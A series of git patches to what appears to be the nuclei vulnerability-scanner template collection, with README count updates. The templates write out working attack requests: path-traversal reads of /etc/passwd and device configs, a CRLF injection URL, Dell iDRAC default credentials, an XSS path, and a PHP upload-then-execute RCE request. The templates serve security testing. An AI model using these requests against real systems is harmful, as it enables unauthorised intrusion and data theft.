Update README [Mon Mar 1 08:51:04 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bafd247be0..cbf05116f2 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 213 | vulnerabilities | 103 | exposed-panels | 87 | +| cves | 214 | vulnerabilities | 103 | exposed-panels | 87 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 15 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**67 directories, 640 files**. +**67 directories, 641 files**. From b9d3325fc6acb6e9462a41efecd4a360c5da82da Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 10:21:32 +0000 Subject: [PATCH 137/370] Create ruijie-networks-lfi.yaml --- .../other/ruijie-networks-lfi.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/other/ruijie-networks-lfi.yaml diff --git a/vulnerabilities/other/ruijie-networks-lfi.yaml b/vulnerabilities/other/ruijie-networks-lfi.yaml new file mode 100644 index 0000000000..03dde58789 --- /dev/null +++ b/vulnerabilities/other/ruijie-networks-lfi.yaml @@ -0,0 +1,30 @@ +id: ruijie-networks-lfi + +info: + name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI + author: pikpikcu + severity: high + reference: https://exploit-db.com/exploits/48755 + tags: ruijie,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/download.do?file=../../../../config.text" + matchers-condition: and + matchers: + + - type: word + words: + - 'filename="config.text"' + - "Content-Type: application/octet-stream" + part: header + - type: word + words: + - "version S29_RGOS 11.4" + part: body + condition: and + + - type: status + status: + - 200 From 154cbf0da6495407cf384bf4a5da0ed8b87f1465 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 10:40:16 +0000 Subject: [PATCH 138/370] Auto Update README [Mon Mar 1 10:40:16 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cbf05116f2..c26ff86f75 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 214 | vulnerabilities | 103 | exposed-panels | 87 | +| cves | 214 | vulnerabilities | 104 | exposed-panels | 87 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 15 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**67 directories, 641 files**. +**67 directories, 642 files**. From be87794843ee4d403924b4feba8bdf5f147818e5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:13:20 +0530 Subject: [PATCH 139/370] misc updates --- default-logins/dell/dell-idrac9-default-login.yaml | 3 +-- workflows/dell-idrac-workflow.yaml | 2 +- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 57d24e87da..6082707615 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -10,9 +10,8 @@ requests: cookie-reuse: true path: - "{{BaseURL}}/sysmgmt/2015/bmc/session" - body: " user=root&password=calvin" + body: "user=root&password=calvin" headers: - Host: "{{Hostname}}" Accept: "application/json, text/plain, */*" user: "root" password: "calvin" diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index 8ae4c19f84..e7385e0602 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -20,4 +20,4 @@ workflows: - template: technologies/dell/dell-idrac9-detect.yaml subtemplates: - - template: default-logins/dell/dell-idrac9-default-login.yaml + - template: default-logins/dell/dell-idrac9-default-login.yaml \ No newline at end of file From 58e03566e65d729057df8ff9c0d227129be904a6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 10:44:33 +0000 Subject: [PATCH 140/370] Create triconsole-xss.yaml --- vulnerabilities/other/triconsole-xss.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/triconsole-xss.yaml diff --git a/vulnerabilities/other/triconsole-xss.yaml b/vulnerabilities/other/triconsole-xss.yaml new file mode 100644 index 0000000000..9e987db15b --- /dev/null +++ b/vulnerabilities/other/triconsole-xss.yaml @@ -0,0 +1,25 @@ +id: triconsole-xss + +info: + name: Triconsole 3.75 XSS + author: pikpikcu + severity: medium + reference: https://cxsecurity.com/issue/WLB-2021020168 + tags: triconsole,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/calendar_form.php/">' + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From b472152f8fd0543da49e041dcf1947af99e5c310 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 10:44:47 +0000 Subject: [PATCH 141/370] Auto Update README [Mon Mar 1 10:44:47 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c26ff86f75..13fcd74097 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 214 | vulnerabilities | 104 | exposed-panels | 87 | -| exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 23 | miscellaneous | 16 | default-logins | 15 | +| exposures | 55 | technologies | 47 | misconfiguration | 49 | +| workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**67 directories, 642 files**. +**68 directories, 646 files**. From 88c371f1818bd256aa7f2eee00a272acd051b780 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 10:45:32 +0000 Subject: [PATCH 142/370] Update triconsole-xss.yaml --- vulnerabilities/other/triconsole-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/triconsole-xss.yaml b/vulnerabilities/other/triconsole-xss.yaml index 9e987db15b..bc5051fca6 100644 --- a/vulnerabilities/other/triconsole-xss.yaml +++ b/vulnerabilities/other/triconsole-xss.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium reference: https://cxsecurity.com/issue/WLB-2021020168 - tags: triconsole,lfi + tags: triconsole,xss requests: - method: GET From bd7f9de154d880e4dadf1c016cbd504a8b5ce011 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:35:54 +0530 Subject: [PATCH 143/370] misc workflow update --- workflows/cacti-workflow.yaml | 2 +- workflows/sap-netweaver-workflow.yaml | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/workflows/cacti-workflow.yaml b/workflows/cacti-workflow.yaml index a077a07ff6..8e2a673caf 100644 --- a/workflows/cacti-workflow.yaml +++ b/workflows/cacti-workflow.yaml @@ -10,4 +10,4 @@ workflows: - template: technologies/cacti-detect.yaml subtemplates: - - template: vulnerabilities/other/cacti-file-write.yaml + - template: vulnerabilities/other/cacti-weathermap-file-write.yaml \ No newline at end of file diff --git a/workflows/sap-netweaver-workflow.yaml b/workflows/sap-netweaver-workflow.yaml index c2c4bf7ce8..ad21f93bdf 100644 --- a/workflows/sap-netweaver-workflow.yaml +++ b/workflows/sap-netweaver-workflow.yaml @@ -10,7 +10,6 @@ info: # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/sap-netweaver-as-java-detect.yaml subtemplates: - template: cves/2020/CVE-2020-6287.yaml From 780c343a95d0a85855217cccff2fcb1810c895ff Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:56:08 +0530 Subject: [PATCH 144/370] Add files via upload Jnoj Directory Traversal --- cves/CVE-2019-17538.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml new file mode 100644 index 0000000000..d42aa4f3eb --- /dev/null +++ b/cves/CVE-2019-17538.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-17538 +info: + name: Jnoj Directory Traversal for file reading(LFI) + author: pussycat0x + severity: High + reference: https://github.com/shi-yang/jnoj/issues/53 + tegs: cve.cve2019,jnoj,cms +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type : regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + From 0a768b9d954d47736e5d574b3888532151609857 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:58:56 +0530 Subject: [PATCH 145/370] Delete CVE-2019-17538.yaml --- cves/CVE-2019-17538.yaml | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml deleted file mode 100644 index d42aa4f3eb..0000000000 --- a/cves/CVE-2019-17538.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2019-17538 -info: - name: Jnoj Directory Traversal for file reading(LFI) - author: pussycat0x - severity: High - reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms -requests: - - raw: - - | - GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - matchers-conditions: and - matchers: - - type : regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - From e281df8e1ffd972445bda94686bd585d51d26021 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:59:32 +0530 Subject: [PATCH 146/370] Add files via upload Jnoj Directory Traversal --- cves/2019/CVE-2019-17538.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/2019/CVE-2019-17538.yaml diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml new file mode 100644 index 0000000000..d42aa4f3eb --- /dev/null +++ b/cves/2019/CVE-2019-17538.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-17538 +info: + name: Jnoj Directory Traversal for file reading(LFI) + author: pussycat0x + severity: High + reference: https://github.com/shi-yang/jnoj/issues/53 + tegs: cve.cve2019,jnoj,cms +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type : regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + From 0e78ce0a5b261b7e106b40525e2b2afcab83a93e Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 11:40:03 +0000 Subject: [PATCH 147/370] Create simple-employee-rce.yaml --- .../other/simple-employee-rce.yaml | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 vulnerabilities/other/simple-employee-rce.yaml diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml new file mode 100644 index 0000000000..ea9315f3fe --- /dev/null +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -0,0 +1,53 @@ +id: simple-employee-rce + +info: + name: Simple Employee Records System 1.0 RCE + author: pikpikcu + severity: critical + reference: https://www.exploit-db.com/exploits/49596 + tags: employee,rce + +requests: + - raw: + - | + POST /dashboard/uploadID.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept: application/json, text/javascript, */*; q=0.01 + Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 + Accept-Encoding: deflate + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 + Content-Length: 267 + DNT: 1 + Connection: close + + -----------------------------5825462663702204104870787337 + Content-Disposition: form-data; name="employee_ID"; filename="poc.php" + Content-Type: image/png + + + -----------------------------5825462663702204104870787337-- + - | + GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 2 + + extractors: + - type: regex + name: endpoint + part: body + internal: true + regex: + - '(?:[a-zA-Z0-9+\/])*_poc.php' + + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + part: body From da44a0facec32ea6b52d0e2291631c09188a3151 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 11:46:14 +0000 Subject: [PATCH 148/370] Create CVE-2021-27330.yaml --- cves/2021/CVE-2021-27330.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2021/CVE-2021-27330.yaml diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml new file mode 100644 index 0000000000..f51b0d1a6b --- /dev/null +++ b/cves/2021/CVE-2021-27330.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-27330 + +info: + name: Triconsole 3.75 XSS + author: pikpikcu + severity: medium + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27330 + tags: cve,cve2021,triconsole,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/calendar_form.php/">' + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From 821ed3db48ef301458a865e5523e46256c628e2c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 11:46:43 +0000 Subject: [PATCH 149/370] Delete triconsole-xss.yaml --- vulnerabilities/other/triconsole-xss.yaml | 25 ----------------------- 1 file changed, 25 deletions(-) delete mode 100644 vulnerabilities/other/triconsole-xss.yaml diff --git a/vulnerabilities/other/triconsole-xss.yaml b/vulnerabilities/other/triconsole-xss.yaml deleted file mode 100644 index bc5051fca6..0000000000 --- a/vulnerabilities/other/triconsole-xss.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: triconsole-xss - -info: - name: Triconsole 3.75 XSS - author: pikpikcu - severity: medium - reference: https://cxsecurity.com/issue/WLB-2021020168 - tags: triconsole,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/calendar_form.php/">' - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - condition: and - - - type: status - status: - - 200 From 3a9f49972b4d40ee8be80cbd37dd85db9f0a1098 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:25:56 +0530 Subject: [PATCH 150/370] Jnoj Directory Traversal --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d42aa4f3eb..669e23d523 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: High reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms + tags: cve.cve2019,jnoj,cms requests: - raw: - | From 1c7cd8921ea49d5aeedaa4a29c7404e4b9aff25c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:26:36 +0530 Subject: [PATCH 151/370] syntax update --- cves/2019/CVE-2019-17538.yaml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d42aa4f3eb..485a98cdef 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,18 +4,20 @@ info: author: pussycat0x severity: High reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms + tegs: cve.cve2019,jnoj,lfi + requests: - raw: - | GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 Content-Type: application/x-www-form-urlencoded - matchers-conditions: and + + matchers-condition: and matchers: - - type : regex - regex: - - "root:[x*]:0:0" - type: status status: - - 200 - + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From ff198c3ad920071e484439617ba7396ac162ae24 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:30:49 +0530 Subject: [PATCH 152/370] Update CVE-2019-17538.yaml --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 485a98cdef..8fd852fb23 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -2,7 +2,7 @@ id: CVE-2019-17538 info: name: Jnoj Directory Traversal for file reading(LFI) author: pussycat0x - severity: High + severity: high reference: https://github.com/shi-yang/jnoj/issues/53 tegs: cve.cve2019,jnoj,lfi From b6ad95cbaa361d65af5ba66ae0f9defb92c833ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 12:06:59 +0000 Subject: [PATCH 153/370] Auto Update README [Mon Mar 1 12:06:59 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 13fcd74097..8c0042cef8 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 214 | vulnerabilities | 104 | exposed-panels | 87 | +| cves | 215 | vulnerabilities | 104 | exposed-panels | 87 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 646 files**. +**68 directories, 647 files**. From a07d7bca4e8224f0ab609f389395db6ad89e6c23 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Mar 2021 14:15:30 +0000 Subject: [PATCH 154/370] Create CVE-2021-27132.yaml --- cves/2021/CVE-2021-27132.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-27132.yaml diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml new file mode 100644 index 0000000000..bbe9fc4077 --- /dev/null +++ b/cves/2021/CVE-2021-27132.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-27132 + +info: + name: CRLF Injection - Sercomm VD625 + author: geeknik + severity: medium + description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header: https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + tags: cve,cve2021,crlf + +requests: + - method: GET + path: + - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" + + matchers-condition: and + matchers: + - type: status + status: + - 404 + part: header + + - type: word + words: + - "Content-Disposition: attachment;filename=test.txt" + - "Set-Cookie:CRLFInjection=Test" + - "Location: example.com" + - "X-XSS-Proection:0" + part: header + condition: and From 9a598c533577d6fdb773ba633912980cdd29e10d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Mar 2021 14:17:25 +0000 Subject: [PATCH 155/370] Update CVE-2021-27132.yaml --- cves/2021/CVE-2021-27132.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index bbe9fc4077..0ae70321ea 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -1,10 +1,10 @@ id: CVE-2021-27132 info: - name: CRLF Injection - Sercomm VD625 + name: CRLF Injection - Sercomm VD625 author: geeknik severity: medium - description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header: https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 tags: cve,cve2021,crlf requests: From b303e7fac70c37f32ce13a60a213357e75d5b106 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:52:43 +0530 Subject: [PATCH 156/370] Create cisco-security-details.yaml --- exposed-panels/cisco-security-details.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/cisco-security-details.yaml diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml new file mode 100644 index 0000000000..560c8debcb --- /dev/null +++ b/exposed-panels/cisco-security-details.yaml @@ -0,0 +1,21 @@ +id: cisco-security-details + +info: + name: Cisco Meraki cloud & Security Appliance details + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6708 + +requests: + - method: GET + path: + - '{{BaseURL}}/#connection' + + matchers-condition: and + matchers: + - type: word + words: + - 'Your client connection' + - type: status + status: + - 200 From 4a5089879799da735658659210b448a470097cf5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:53:12 +0530 Subject: [PATCH 157/370] Create total-web.yaml --- exposed-panels/total-web.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/total-web.yaml diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml new file mode 100644 index 0000000000..e57c77187e --- /dev/null +++ b/exposed-panels/total-web.yaml @@ -0,0 +1,21 @@ +id: total-web-login + +info: + name: Total Web Solution + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6811 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Total Web Solutions' + - type: status + status: + - 200 From 7aed941d67799cf127027ac82d3c690152be6ab3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:55:34 +0530 Subject: [PATCH 158/370] Update total-web.yaml --- exposed-panels/total-web.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml index e57c77187e..5fd52916e7 100644 --- a/exposed-panels/total-web.yaml +++ b/exposed-panels/total-web.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6811 - + requests: - method: GET path: From f89245ca4a4c1b2033f351b9d757277bad0e1ecf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:55:51 +0530 Subject: [PATCH 159/370] Update total-web.yaml --- exposed-panels/total-web.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml index 5fd52916e7..3eb9c9200e 100644 --- a/exposed-panels/total-web.yaml +++ b/exposed-panels/total-web.yaml @@ -1,7 +1,7 @@ id: total-web-login info: - name: Total Web Solution + name: Total Web Solution author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6811 From 8e029c7d198ee1330bb022117a41fb113d9a17ea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:59:17 +0530 Subject: [PATCH 161/370] Update total-web.yaml --- exposed-panels/total-web.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml index 3eb9c9200e..2515138891 100644 --- a/exposed-panels/total-web.yaml +++ b/exposed-panels/total-web.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6811 - + requests: - method: GET path: From b201743b2259d0a97f189a3585f4cb771c26ab20 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 23:04:55 +0530 Subject: [PATCH 162/370] Update cisco-security-details.yaml --- exposed-panels/cisco-security-details.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml index 560c8debcb..80c033654d 100644 --- a/exposed-panels/cisco-security-details.yaml +++ b/exposed-panels/cisco-security-details.yaml @@ -15,7 +15,7 @@ requests: matchers: - type: word words: - - 'Your client connection' +- 'Your client connection' - type: status status: - 200 From c568fbc7dc27822e631701230b2d4db6218850f0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 23:07:09 +0530 Subject: [PATCH 163/370] Update cisco-security-details.yaml --- exposed-panels/cisco-security-details.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml index 80c033654d..a6d57e0007 100644 --- a/exposed-panels/cisco-security-details.yaml +++ b/exposed-panels/cisco-security-details.yaml @@ -15,7 +15,7 @@ requests: matchers: - type: word words: -- 'Your client connection' + - 'Your client connection' - type: status status: - 200 From 3d331c7191056eb301c0681ae12866502ae1e2f3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 18:52:55 +0000 Subject: [PATCH 164/370] Auto Update README [Mon Mar 1 18:52:55 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8c0042cef8..be95c2aa0a 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 215 | vulnerabilities | 104 | exposed-panels | 87 | +| cves | 215 | vulnerabilities | 104 | exposed-panels | 89 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 647 files**. +**68 directories, 649 files**. From 15f52ad5861867b0708b5722b3873d30c80b1645 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Mar 2021 20:34:15 +0000 Subject: [PATCH 165/370] Update CVE-2021-27132.yaml omg typo --- cves/2021/CVE-2021-27132.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 0ae70321ea..0f16811c2a 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -24,6 +24,6 @@ requests: - "Content-Disposition: attachment;filename=test.txt" - "Set-Cookie:CRLFInjection=Test" - "Location: example.com" - - "X-XSS-Proection:0" + - "X-XSS-Protection:0" part: header condition: and From 3e1c8309ebdcf12cbb662966de8f1fcb9fe6aa09 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 2 Mar 2021 09:53:18 +0700 Subject: [PATCH 166/370] :fire: Add CVE-2020-26948 --- cves/2020/CVE-2020-26948.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2020/CVE-2020-26948.yaml diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml new file mode 100644 index 0000000000..5c325dc865 --- /dev/null +++ b/cves/2020/CVE-2020-26948.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-26948 + +info: + name: Emby Server SSRF + author: dwisiswant0 + severity: critical + reference: https://github.com/btnz-k/emby_ssrf + description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. + tags: cve,cve2020,emby,jellyfin,ssrf + +requests: + - method: GET + path: + - 